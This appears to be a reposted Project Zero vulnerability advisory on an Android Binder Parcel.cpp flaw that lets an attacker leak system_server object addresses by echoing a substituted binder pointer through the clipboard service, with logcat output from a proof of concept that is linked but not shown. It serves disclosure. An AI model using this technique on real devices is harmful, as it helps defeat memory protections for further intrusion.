When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time. One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip(). A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk). Its logcat output looks like this: =============== [...] 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964 01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71 01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" == type: BINDER_TYPE_BINDER object: 0x000000712967e260 == service "package" == type: BINDER_TYPE_BINDER object: 0x000000712963cfc0 == service "clipboard" == type: BINDER_TYPE_BINDER object: 0x00000071367bfd80 =============== PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=860 # Iranian Exploit DataBase = http://IeDb.Ir [2016-10-09]